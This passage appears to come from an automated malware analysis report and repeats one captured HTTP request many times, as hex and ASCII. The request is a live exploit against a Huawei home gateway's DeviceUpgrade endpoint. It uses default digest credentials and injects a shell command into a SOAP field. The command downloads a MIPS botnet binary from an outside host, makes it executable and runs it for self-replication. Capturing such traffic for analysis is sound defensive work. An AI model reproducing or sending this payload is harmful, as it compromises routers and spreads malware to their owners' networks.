57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 